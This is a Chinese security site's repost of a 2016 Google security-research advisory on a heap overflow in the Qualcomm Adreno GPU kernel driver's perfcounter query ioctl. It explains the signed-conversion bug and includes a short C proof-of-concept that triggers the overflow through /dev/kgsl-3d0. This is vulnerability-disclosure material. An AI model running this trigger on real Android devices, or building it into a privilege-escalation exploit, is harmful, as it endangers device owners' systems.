首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Qualcomm Adreno GPU MSM Driver perfcounter Query Heap Overflow
来源:google.com 作者:Google 发布时间:2016-02-29  
/*
Source: https://code.google.com/p/google-security-research/issues/detail?id=734
 
The Adreno GPU driver for the MSM Linux kernel contains a heap
overflow in the IOCTL_KGSL_PERFCOUNTER_QUERY ioctl command. The bug
results from an incorrect conversion to a signed type when calculating
the minimum count value for the query option. This results in a
negative integer being used to calculate the size of a buffer, which
can result in an integer overflow and a small sized allocation on
32-bit systems:
 
int adreno_perfcounter_query_group(struct adreno_device *adreno_dev,
        unsigned int groupid, unsigned int __user *countables,
        unsigned int count, unsigned int *max_counters)
{
...
        if (countables == NULL || count == 0) {
                kgsl_mutex_unlock(&device->mutex, &device->mutex_owner);
                return 0;
        }
 
        t = min_t(int, group->reg_count, count);
 
        buf = kmalloc(t * sizeof(unsigned int), GFP_KERNEL);
        if (buf == NULL) {
                kgsl_mutex_unlock(&device->mutex, &device->mutex_owner);
                return -ENOMEM;
        }
 
        for (i = 0; i < t; i++)
                buf[i] = group->regs[i].countable;
 
Note that the "count" parameter is fully controlled. Setting count =
0x80000001 will result in min_t returning 0x80000001 for "t", and
kmalloc allocating a buffer of size 0x4. The loop will then overflow
"buf" because "t" is unsigned, i.e. a large positive value.
 
The bug was added in the following commit:
 
https://www.codeaurora.org/cgit/quic/la/kernel/msm/commit/drivers/gpu/msm/adreno.c?h=aosp-new/android-msm-angler-3.10-marshmallow-mr1&id=b3b5629aebe98d3eb5ec22e8321c3cd3fc70f59c
 
A proof-of-concept that triggers this issue (adreno_perfcnt_query.c)
is attached. On Android devices /dev/kgsl-3d0 is typically accessible
in an untrusted app domain, so if exploited this issue could be used
for local privilege escalation.
 
*/
 
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sys/ioctl.h>
 
struct kgsl_perfcounter_query {
    unsigned int groupid;
    unsigned int *countables;
    unsigned int count;
    unsigned int max_counters;
    unsigned int __pad[2];
};
 
#define KGSL_IOC_TYPE 0x09
#define IOCTL_KGSL_PERFCOUNTER_QUERY _IOWR(KGSL_IOC_TYPE, 0x3A, struct kgsl_perfcounter_query)
 
int main(void) {
    int fd;
    struct kgsl_perfcounter_query data;
    unsigned int countables[16];
 
    fd = open("/dev/kgsl-3d0", O_RDWR);
 
    if (fd == -1) {
        perror("open");
        return -1;
    }
 
    memset(&data, 0, sizeof(struct kgsl_perfcounter_query));
 
    data.groupid = 1;
    data.countables = (unsigned int *) &countables;
    data.count = 0x80000001;
 
    ioctl(fd, IOCTL_KGSL_PERFCOUNTER_QUERY, &data);
 
    close(fd);
 
    return 0;
}
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·GpicView 0.2.5 - Crash PoC
·Centreon 2.5.3 Code Execution
·Proxmox VE 3/4 Insecure Hostna
·Comodo Anti-Virus SHFolder.DLL
·Linux io_submit L2TP Sendmsg I
·ASAN/SUID Local Root Exploit
·libquicktime 1.2.4 - Integer O
·NETGEAR ProSafe Network Manage
·Core FTP Server 1.2 - Buffer O
·ATutor 2.2.1 SQL Injection / R
·Adobe Cross Site Scripting / O
·AppLocker Execution Prevention
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved